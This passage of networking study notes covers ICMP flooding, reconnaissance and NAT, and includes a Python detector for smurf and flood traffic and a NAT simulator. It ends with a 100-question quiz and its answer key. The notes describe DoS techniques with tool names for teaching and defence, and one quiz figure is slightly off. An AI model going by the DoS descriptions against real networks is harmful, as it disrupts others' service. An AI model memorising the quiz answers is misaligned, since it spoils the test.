  • Rate limiting

2. ICMP FLOODING

Attack:

  • Send massive amount of ICMP Echo Requests
  • Overwhelm victim’s bandwidth/processing

Tools:

  • hping3, ping with high rate

Prevention:

  • Rate limiting ICMP
  • Firewall rules

3. RECONNAISSANCE

Using ICMP for network mapping:

  • Ping sweep: Discover live hosts
  • Traceroute: Map network topology
  • ICMP Timestamp: Get system time

Tools:

  • nmap -sn (ping scan)
  • traceroute
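Added example (not from these notes): detection logic for the two ICMP DoS patterns in this part, run over a constructed list of packet records of the kind a sensor exports (timestamp, source, destination, ICMP type). It flags echo requests addressed to the subnet's broadcast address (the smurf trigger), a burst of echo replies converging on one destination (the smurf victim), and a high echo-request rate from a single source (flooding). The monitored subnet, the thresholds and the sample traffic are all assumptions made for the example.

```python
from collections import defaultdict
import ipaddress

LOCAL_NET = ipaddress.ip_network("10.9.0.0/24")   # assumed monitored subnet
ECHO_REQUEST, ECHO_REPLY = 8, 0                      # ICMP types
WINDOW = 1.0            # sliding window in seconds (assumed)
REPLY_THRESHOLD = 20    # echo replies per window to one destination (assumed)
REQUEST_THRESHOLD = 50  # echo requests per window from one source (assumed)

def _over_rate(times, ts, threshold):
    """Append ts, discard entries older than WINDOW, report whether the rate is exceeded."""
    times.append(ts)
    while times and ts - times[0] > WINDOW:
        times.pop(0)
    return len(times) > threshold

def detect(records):
    """records: iterable of (timestamp, src, dst, icmp_type) tuples.
    Returns a list of (finding, src, dst, timestamp)."""
    findings, flagged = [], set()
    reply_times = defaultdict(list)     # dst -> recent echo-reply timestamps
    request_times = defaultdict(list)   # src -> recent echo-request timestamps
    for ts, src, dst, itype in sorted(records):
        if itype == ECHO_REQUEST:
            # smurf trigger: an echo request aimed at the directed broadcast address
            if ipaddress.ip_address(dst) == LOCAL_NET.broadcast_address:
                findings.append(("broadcast-echo-request", src, dst, ts))
            # flood: one source exceeding the request rate (reported once per source)
            if _over_rate(request_times[src], ts, REQUEST_THRESHOLD) and ("flood", src) not in flagged:
                flagged.add(("flood", src))
                findings.append(("icmp-flood", src, dst, ts))
        elif itype == ECHO_REPLY:
            # smurf victim: many hosts' replies converging on one destination
            if _over_rate(reply_times[dst], ts, REPLY_THRESHOLD) and ("smurf", dst) not in flagged:
                flagged.add(("smurf", dst))
                findings.append(("smurf-victim", src, dst, ts))
    return findings

def constructed_records():
    """Constructed sample traffic: a benign ping exchange, a smurf burst, and a flood."""
    recs = []
    for i in range(5):                                   # benign: one ping per second
        recs.append((i + 0.0, "10.9.0.5", "10.9.0.11", ECHO_REQUEST))
        recs.append((i + 0.01, "10.9.0.11", "10.9.0.5", ECHO_REPLY))
    recs.append((10.0, "10.9.0.5", "10.9.0.255", ECHO_REQUEST))   # spoofed src, broadcast dst
    for i in range(30):                                  # 30 hosts answer the "victim"
        recs.append((10.0 + i * 0.01, "10.9.0.%d" % (20 + i), "10.9.0.5", ECHO_REPLY))
    for i in range(80):                                  # 80 requests in 0.4 s from one host
        recs.append((20.0 + i * 0.005, "10.9.0.77", "10.9.0.5", ECHO_REQUEST))
    return recs

if __name__ == "__main__":
    for finding in detect(constructed_records()):
        print(finding)
```

The broadcast rule matches the prevention advice above: if routers do not forward directed broadcasts and hosts ignore echo requests to broadcast addresses, the first finding is the only trace a smurf attempt leaves. The rate rules are the detection counterpart of ICMP rate limiting.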

PART 9: NAT (NETWORK ADDRESS TRANSLATION)

1. CONCEPT

Purpose:

  • All devices in local network share ONE IPv4 address (as far as outside world concerned)

How it works:

Local network:

10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4 (NAT router)

Outside world sees:

138.76.29.7 (public IP)

2. NAT TRANSLATION

Outgoing:

  1. Host 10.0.0.1:3345 → 128.119.40.186:80
  2. NAT router changes:
    • Source: 10.0.0.1:3345 → 138.76.29.7:5001
    • Destination: 128.119.40.186:80 (unchanged)
  3. Updates NAT translation table:
    WAN side          | LAN side
    138.76.29.7:5001  | 10.0.0.1:3345

Incoming:

  1. Reply: 128.119.40.186:80 → 138.76.29.7:5001
  2. NAT router looks up table:
    • 138.76.29.7:5001 → 10.0.0.1:3345
  3. Changes destination:
    • 128.119.40.186:80 → 10.0.0.1:3345
  4. Delivers to internal host

Characteristics:

  • Datagrams leaving local network: same source NAT IP, different source ports
  • Datagrams inside network: 10.0.0/24 addresses (as usual)
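Added example (not from these notes): a minimal port-translating NAT that performs the outgoing and incoming steps listed above and keeps the WAN-side / LAN-side table. The public address, the internal hosts and the first allocated port (5001) are the values the notes use; what happens to an inbound packet with no table entry (it is dropped) is an assumption that matches how a port-translating NAT normally behaves.

```python
class NatRouter:
    def __init__(self, public_ip, first_port=5001):
        self.public_ip = public_ip
        self.next_port = first_port
        self.wan_to_lan = {}   # (public_ip, port) -> (lan_ip, lan_port)
        self.lan_to_wan = {}   # reverse index so an existing flow keeps its port

    def outgoing(self, src_ip, src_port, dst_ip, dst_port):
        """LAN -> WAN: rewrite the source to the public IP and a fresh port;
        the destination is left unchanged. Returns the rewritten 4-tuple."""
        key = (src_ip, src_port)
        if key not in self.lan_to_wan:
            wan = (self.public_ip, self.next_port)   # new table entry
            self.next_port += 1
            self.lan_to_wan[key] = wan
            self.wan_to_lan[wan] = key
        pub_ip, pub_port = self.lan_to_wan[key]
        return (pub_ip, pub_port, dst_ip, dst_port)

    def incoming(self, src_ip, src_port, dst_ip, dst_port):
        """WAN -> LAN: look the destination port up in the table and rewrite
        the destination to the internal host. No entry: the packet is dropped."""
        lan = self.wan_to_lan.get((dst_ip, dst_port))
        if lan is None:
            return None
        return (src_ip, src_port, lan[0], lan[1])

    def table(self):
        """The translation table in the notes' layout: (WAN side, LAN side)."""
        return [("%s:%d" % wan, "%s:%d" % lan) for wan, lan in self.wan_to_lan.items()]

if __name__ == "__main__":
    nat = NatRouter("138.76.29.7")
    print(nat.outgoing("10.0.0.1", 3345, "128.119.40.186", 80))
    print(nat.incoming("128.119.40.186", 80, "138.76.29.7", 5001))
    print(nat.table())
```

Because every outgoing flow gets its own public port, two internal hosts using the same local port (10.0.0.1:3345 and 10.0.0.2:3345) still map to distinct WAN entries, and replies for each find their way back. The 16-bit port field is what bounds the number of simultaneous flows a single public address can carry.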

CHAPTER 8 QUESTION BANK

PART 1: NETWORK LAYER BASICS

Question 1: What does the network layer transport?

A. Frames

B. Segments from sending to receiving host

C. Bits

D. Messages

Question 2: What does the sender encapsulate into datagrams?

A. Frames

B. Segments

C. Packets

D. Messages

Question 3: Where are network layer protocols found?

A. Only routers

B. Only hosts

C. Every Internet device: hosts, routers

D. Only switches

Question 4: What do routers examine in datagrams?

A. Only destination IP

B. Header fields

C. Only payload

D. Only checksum

Question 5: What is forwarding?

A. Planning trip

B. Move packets from input link to output link (local, per-router)

C. Global routing

D. Error correction

Question 6: What is routing?

A. Local forwarding

B. Determine route from source to destination (network-wide logic)

C. Error checking

D. Compression

Question 7: Forwarding is analogous to what?

A. Planning entire trip

B. Getting through single interchange

C. Choosing destination

D. Buying ticket

Question 8: Routing is analogous to what?

A. Driving through one intersection

B. Planning trip from source to destination

C. Stopping at one place

D. Refueling

Question 9: What is the data plane?

A. Global logic

B. Local, per-router function - forwarding

C. Remote control

D. Application layer

Question 10: What is the control plane?

A. Local forwarding

B. Network-wide logic - routing

C. Data transmission

D. Error handling

Question 11: What are the two approaches to the control plane?

A. Fast and Slow

B. Traditional routing algorithms AND SDN

C. Manual and Automatic

D. Wired and Wireless

Question 12: Where are traditional routing algorithms implemented?

A. Remote servers

B. IN routers

C. Cloud

D. Hosts only

Question 13: Where is SDN (Software-Defined Networking) implemented?

A. In routers

B. Remote servers

C. Switches

D. Hosts

Question 14: In SDN, who computes the forwarding tables?

A. Each router independently

B. Remote Controller

C. Switches

D. Hosts

PART 2: IP DATAGRAM FORMAT

Question 15: IP header minimum size?

A. 8 bytes

B. 20 bytes

C. 32 bytes

D. 40 bytes

Question 16: IP Version field value for IPv4?

A. 1

B. 2

C. 4

D. 6

Question 17: IHL (Header Length) unit?

A. Bytes

B. 32-bit words

C. Bits

D. KB

Question 18: What is IHL typically equal to?

A. 4

B. 5 (5 × 4 = 20 bytes)

C. 10

D. 20

Question 19: How many bits is the Total Length field?

A. 8

B. 16

C. 32

D. 64

Question 20: Maximum IP datagram size?

A. 1500 bytes

B. 65,535 bytes (64KB)

C. 1 MB

D. Unlimited

Question 21: Typical IP datagram size?

A. 64 KB

B. 1500 bytes or less

C. 100 bytes

D. 10 KB

Question 22: How many bits is the Flags field?

A. 1

B. 2

C. 3

D. 8

Question 23: What does the MF flag mean?

A. Must Forward

B. More Fragments

C. Maximum Forward

D. Minimum Fragments

Question 24: How many bits is the Fragment Offset field?

A. 8

B. 13

C. 16

D. 32

Question 25: Fragment Offset unit?

A. Bytes

B. 8-byte blocks

C. Bits

D. 32-bit words

Question 26: Why is the Fragment Offset ÷ 8?

A. Faster calculation

B. Saves bits; can address 65,528 bytes instead of 8,191

C. Easier to understand

D. Random choice

Question 27: What is TTL?

A. Total Transfer Length

B. Time To Live - remaining max hops

C. Type To Link

D. Transport Layer Level

Question 28: What happens to TTL at each router?

A. Incremented by 1

B. Decremented (reduced by 1)

C. Unchanged

D. Reset to 255

Question 29: When TTL = 0, what does the router do?

A. Forward packet

B. Drops packet, sends ICMP Time Exceeded

C. Increase TTL

D. Broadcast packet

Question 30: What does Protocol field = 6 mean?

A. UDP

B. TCP

C. ICMP

D. IP

Question 31: What does Protocol field = 17 mean?

A. TCP

B. UDP

C. ICMP

D. ARP

Question 32: What does Protocol field = 1 mean?

A. TCP

B. UDP

C. ICMP

D. HTTP

Question 33: What does the Header Checksum cover?

A. Entire datagram

B. Header only (NOT payload)

C. Only payload

D. Only Source IP

Question 34: IP overhead with TCP?

A. 20 bytes

B. 40 bytes

C. 20 bytes IP + 20 bytes TCP = 40 bytes + app overhead

D. 60 bytes

PART 3: TTL & TRACEROUTE

Question 35: Main purpose of TTL?

A. Security

B. Prevent infinite loops

C. Encryption

D. Compression

Question 36: What does traceroute send to the destination?

A. ICMP

B. TCP

C. UDP segments

D. ARP

Question 37: What TTL does the traceroute 1st set have?

A. 0

B. 1

C. 64

D. 255

Question 38: What TTL does the traceroute 2nd set have?

A. 1

B. 2

C. 10

D. 20

Question 39: Which ICMP message type/code does the nth router send?

A. Type 0, Code 0

B. Type 11, Code 0 (Time Exceeded)

C. Type 3, Code 3

D. Type 8, Code 0

Question 40: When does traceroute stop?

A. TTL = 255

B. Destination returns ICMP Type 3 Code 3 (Port Unreachable)

C. No reply

D. After 10 hops

PART 4: IP FRAGMENTATION

Question 41: What is MTU?

A. Minimum Transfer Unit

B. Max Transfer Size - largest possible link-level frame

C. Multiple Transfer Unit

D. Media Type Unit

Question 42: Typical Ethernet MTU?

A. 576 bytes

B. 1500 bytes

C. 4000 bytes

D. 64 KB

Question 43: Where is an IP datagram reassembled?

A. First router

B. Every router

C. ONLY at destination

D. Source

Question 44: Fragment 1 of a 4000-byte datagram (MTU=1500): Length?

A. 4000

B. 1500

C. 1480

D. 20

Question 45: Fragment 1: Data size (excluding header)?

A. 1500

B. 1480 (1500 - 20)

C. 1460

D. 20

Question 46: Fragment 2 offset (after 1480 bytes of data)?

A. 1480

B. 185 (1480 ÷ 8)

C. 200

D. 1500

Question 47: What flag does the last fragment have?

A. 1

B. 0 (No More Fragments)

C. 2

D. 3

Question 48: What flag do middle fragments have?

A. 0

B. 1 (More Fragments)

C. 2

D. 3

PART 5: IP FRAGMENTATION ATTACKS

Question 49: What does Protocol Violation mean?

A. Following rules

B. Breaking protocol rules

C. Encrypting data

D. Compressing packets

Question 50: What does the Ping of Death attack do?

A. Send normal pings

B. Create IP packet LARGER than 65,536 bytes

C. Delete packets

D. Encrypt packets

Question 51: What does a PoD attack cause?

A. Slow network

B. Buffer overflow

C. Fast forwarding

D. Encryption error

Question 52: Last fragment with offset=8191, length=1000: real size?

A. 65,536

B. 66,500 bytes (> 65,536!)

C. 64,000

D. 8,191

Question 53: What is CVE-2020-16898?

A. ARP vulnerability

B. Windows TCP/IP Stack PoD in ICMPv6

C. DNS bug

D. HTTP flaw

Question 54: What does the Teardrop attack create?

A. Normal fragments

B. Overlapping fragments

C. Encrypted fragments

D. Compressed fragments

Question 55: Teardrop: Fragment 1 offset=0 length=820, Fragment 2 offset=600: overlap?

A. No overlap

B. Gap

C. Negative overlap (HUGE unsigned value)

D. Perfect fit

Question 56: DoS with fragmentation: how many packets are sent?

A. Thousands

B. Millions

C. 2 tiny packets (~100 bytes each)

D. One large packet

Question 57: How many resources does the fragmentation DoS tie up?

A. 100 bytes

B. 1 KB

C. 64 KB

D. 1 MB

Question 58: Why is the fragmentation DoS efficient?

A. Fast

B. Small bandwidth → Large resource consumption

C. Encrypted

D. Compressed

PART 6: ROUTING

Question 59: Linux command to show the routing table?

A. ifconfig

B. netstat

C. ip route

D. route -n

Question 60: Linux command to add a route?

A. route add

B. sudo ip route add

C. ifconfig add

D. netstat add

Question 61: Main routing rule?

A. First match

B. Longest match

C. Shortest match

D. Random

Question 62: 192.168.60.5 matches /0, /16, /24, /32. Which is chosen?

A. /0

B. /16

C. /24

D. /32 (longest!)

Question 63: How do routers configure their routing table?

A. Only manually

B. Routing protocols (OSPF, BGP)

C. Only DHCP

D. Only DNS

Question 64: How do hosts configure their routing table?

A. Only routing protocols

B. DHCP, default routers, manual, ICMP redirect

C. Only DHCP

D. Only manually

Question 65: What does RPF stand for?

A. Rapid Packet Forwarding

B. Reverse Path Filtering / Reverse-Path Forwarding

C. Random Protocol Function

D. Router Protection Feature

Question 66: What does RPF protect against?

A. Virus

B. Packet spoofing

C. DDoS only

D. Encryption

Question 67: How does RPF work?

A. Block all packets

B. Reverse lookup: return path same interface → Allow, else Drop

C. Forward all

D. Encrypt packets

Question 68: Symmetric routing in RPF?

A. Drop packet

B. Allow packet (return path same interface)

C. Encrypt packet

D. Broadcast packet

Question 69: Asymmetric routing in RPF?

A. Allow packet

B. Drop packet (return path different interface)

C. Forward packet

D. Modify packet

PART 7: ICMP PROTOCOL

Question 70: What does ICMP stand for?

A. Internet Connection Management Protocol

B. Internet Control Message Protocol

C. Internal Communication Message Protocol

D. IP Control Management Protocol

Question 71: Who uses ICMP?

A. Only hosts

B. Only routers

C. Hosts AND routers

D. Only switches

Question 72: What does ICMP communicate?

A. Application data

B. Network-level information

C. Only errors

D. Only routing

Question 73: What are ICMP messages carried in?

A. Ethernet frames only

B. IP datagrams

C. TCP segments

D. UDP packets

Question 74: What is ICMP Type 0 Code 0?

A. Echo Request

B. Echo Reply (ping)

C. Time Exceeded

D. Unreachable

Question 75: What is ICMP Type 8 Code 0?

A. Echo Reply

B. Echo Request (ping)

C. Time Exceeded

D. Unreachable

Question 76: What is ICMP Type 11 Code 0?

A. Echo Reply

B. Unreachable

C. TTL Expired / Time Exceeded

D. Redirect

Question 77: What is ICMP Type 3 Code 3?

A. Network Unreachable

B. Host Unreachable

C. Dest Port Unreachable

D. Echo Reply

Question 78: What is ICMP Type 5 Code 0?

A. Echo Request

B. Time Exceeded

C. Redirect

D. Unreachable

Question 79: Which ICMP types does ping use?

A. Type 11

B. Type 8 (Request) and Type 0 (Reply)

C. Type 3

D. Type 5

Question 80: Which ICMP type does traceroute receive?

A. Type 0

B. Type 8

C. Type 11 (Time Exceeded)

D. Type 5

PART 8: ICMP REDIRECT ATTACK

Question 81: Legitimate purpose of ICMP Redirect?

A. Attack only

B. Tell a host about a better route

C. Encrypt traffic

D. Block traffic

Question 82: What does an ICMP Redirect contain?

A. Entire routing table

B. Better gateway IP address

C. All routes

D. DNS info

Question 83: ICMP Redirect Type and Code?

A. Type 0, Code 0

B. Type 8, Code 0

C. Type 5, Code 0

D. Type 11, Code 0

Question 84: What does an attacker use ICMP Redirect for?

A. DoS

B. MITM attack

C. Sniffing only

D. Encryption

Question 85: Can an ICMP Redirect be launched from a remote computer?

A. Yes

B. NO - host checks that the gateway is on the same network

C. Depends on the firewall

D. Only with VPN

Question 86: Can an ICMP Redirect redirect to a remote computer?

A. Yes

B. NO - RPF drops it; gateway must be on the same subnet

C. Depends on the router

D. Only TCP

Question 87: Where does ICMP Redirect work?

A. Globally

B. Locally (same LAN)

C. Internet-wide

D. Cloud only

PART 9: SMURF ATTACK & ICMP DoS

Question 88: What does the Smurf attack use?

A. TCP SYN

B. ICMP Echo Request to broadcast address

C. UDP flood

D. ARP poisoning

Question 89: What does the Smurf attack spoof?

A. Destination IP

B. Source IP = Victim’s IP

C. MAC address

D. Port number

Question 90: Smurf attack destination?

A. Unicast

B. Broadcast address

C. Multicast

D. Loopback

Question 91: In a Smurf attack, what do all hosts do?

A. Ignore

B. Forward

C. Reply to victim with Echo Reply

D. Block

Question 92: What does the Smurf attack cause for the victim?

A. Speed up

B. Overwhelmed with Echo Replies - DoS

C. Security improvement

D. Nothing

Question 93: Prevention for the Smurf attack?

A. Use TCP

B. Configure routers to NOT forward broadcast packets, disable ICMP to broadcast

C. Use VPN

D. Stronger passwords

Question 94: What is ICMP Flooding?

A. Normal pings

B. Send massive amount of ICMP Echo Requests

C. One ping

D. Encrypted ICMP

Question 95: How is ICMP used for reconnaissance?

A. Not possible

B. Ping sweep: discover live hosts; Traceroute: map topology

C. Only encryption

D. Only authentication

PART 10: NAT

Question 96: What does NAT stand for?

A. Network Authentication Technology

B. Network Address Translation

C. New Advanced Transmission

D. National Address Table

Question 97: What does NAT allow?

A. Faster Internet

B. All devices in local network share ONE IPv4 address

C. More security only

D. Encryption

Question 98: What do datagrams leaving the local network have in common?

A. Destination

B. Same source NAT IP, different source ports

C. Protocol

D. TTL

Question 99: What does the NAT translation table contain?

A. Only IP addresses

B. Only ports

C. WAN side addr:port ↔ LAN side addr:port

D. MAC addresses

Question 100: What does the NAT router do with an outgoing packet?

A. Chỉ forward

B. Changes source IP:port to NAT public IP:new port, updates table

C. Drops packet

D. Encrypts packet


QUICK ANSWER KEY

1.B 2.B 3.C 4.B 5.B 6.B 7.B 8.B 9.B 10.B 11.B 12.B 13.B 14.B 15.B 16.C 17.B 18.B 19.B 20.B 21.B 22.C 23.B 24.B 25.B 26.B 27.B 28.B 29.B 30.B 31.B 32.C 33.B 34.C 35.B 36.C 37.B 38.B 39.B 40.B 41.B 42.B 43.C 44.B 45.B 46.B 47.B 48.B 49.B 50.B 51.B 52.B 53.B 54.B 55.C 56.C 57.C 58.B 59.C 60.B 61.B 62.D 63.B 64.B 65.B 66.B 67.B 68.B 69.B 70.B 71.C 72.B 73.B 74.B 75.B 76.C 77.C 78.C 79.B 80.C 81.B 82.B 83.C 84.B 85.B 86.B 87.B 88.B 89.B 90.B 91.C 92.B 93.B 94.B 95.B 96.B 97.B 98.B 99.C 100.B


QUICK SUMMARY TABLE - CHAPTER 8

1. NETWORK LAYER

  • Forwarding: Local, move packets input→output
  • Routing: Global, determine paths, routing algorithms
  • Data plane: Local forwarding
  • Control plane: Network-wide routing (Traditional in routers, SDN remote)

2. IP HEADER

  • Min 20 bytes: Ver(4b), IHL(4b), ToS(8b), TotalLen(16b), ID(16b), Flags(3b), Offset(13b), TTL(8b), Proto(8b), Chksum(16b), SrcIP(32b), DstIP(32b)
  • Max size: 65,535 bytes (16-bit Total Length)
  • TTL: Decremented at every hop, = 0 → drop + ICMP Type 11
  • Offset: ÷ 8 (address 65,528 bytes)

3. FRAGMENTATION

  • MTU: 1500 bytes (Ethernet)
  • Reassembly: ONLY at destination
  • Offset = data_bytes ÷ 8
  • Flags: 1 = More Fragments, 0 = Last

4. FRAGMENTATION ATTACKS

  • Ping of Death: Packet > 65,536 bytes → buffer overflow
  • Teardrop: Overlapping fragments → negative gap
  • DoS: 2 packets (offset 0 & 65535) → tie 64KB resources

5. ROUTING

  • Rule: Longest match
  • RPF: Reverse lookup, symmetric = Allow, asymmetric = Drop
  • Config: Routers (OSPF, BGP), Hosts (DHCP, default, manual, ICMP redirect)

6. ICMP TYPES

  • 0: Echo Reply (ping)
  • 3: Dest Unreachable (code 0=net, 1=host, 3=port)
  • 5: Redirect (MITM!)
  • 8: Echo Request (ping)
  • 11: TTL Expired (traceroute)

7. ICMP ATTACKS

  • Redirect: MITM, ONLY local (same LAN), RPF blocks remote
  • Smurf: Spoof src=victim, dst=broadcast → all reply victim
  • Flooding: Massive ICMP → DoS

8. NAT

  • Purpose: All local devices share 1 public IP
  • Table: WAN addr:port ↔ LAN addr:port
  • Outgoing: Change src to NAT IP:new port

EXAM PREP: Memorize the IP header fields, TTL and traceroute, fragmentation (offset ÷ 8, reassembly at destination), the 3 fragmentation attacks, longest-match routing, RPF, ICMP types (0, 3, 5, 8, 11), the limitations of ICMP attacks (local only, RPF), and NAT translation!